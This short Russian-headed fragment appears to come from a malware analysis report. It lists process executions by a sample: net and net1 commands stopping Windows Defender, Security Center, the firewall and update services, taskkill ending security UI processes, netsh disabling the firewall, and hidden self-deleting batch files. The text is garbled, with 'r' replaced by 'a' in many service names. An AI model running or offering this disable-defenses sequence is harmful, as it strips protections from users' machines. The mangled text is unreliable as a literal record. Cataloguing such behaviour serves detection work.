Техническая информация
- '%WINDIR%\syswow64\net.exe' stop ôSecuaity Centeaö
- '%WINDIR%\syswow64\net.exe' stop "WinDefend"
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im "MSASCui.exe"
- '%WINDIR%\syswow64\net.exe' stop "WSeaach"
- '%WINDIR%\syswow64\net.exe' stop "wuauseav"
- '%WINDIR%\syswow64\net.exe' stop "WPCSvc"
- '%WINDIR%\syswow64\net.exe' stop "MpsSvc"
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im "FiaewallContaolPanel.exe"
- '%WINDIR%\syswow64\net.exe' stop "WeaSvc"
- '%WINDIR%\syswow64\net.exe' stop "wscsvc"
- %TEMP%\26a0.tmp\batchfile.bat
- %TEMP%\selfdel0.bat
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\selfdel0.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\26A0.tmp\batchfile.bat" "
- '%WINDIR%\syswow64\net1.exe' stop ôSecuaity Centeaö
- '%WINDIR%\syswow64\netsh.exe' fiaewall set opmode mode=disable
- '%WINDIR%\syswow64\net1.exe' stop "WinDefend"
- '%WINDIR%\syswow64\net1.exe' stop "WSeaach"
- '%WINDIR%\syswow64\net1.exe' stop "wuauseav"
- '%WINDIR%\syswow64\net1.exe' stop "WPCSvc"
- '%WINDIR%\syswow64\net1.exe' stop "MpsSvc"
- '%WINDIR%\syswow64\net1.exe' stop "WeaSvc"
- '%WINDIR%\syswow64\net1.exe' stop "wscsvc"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\selfdel0.bat" "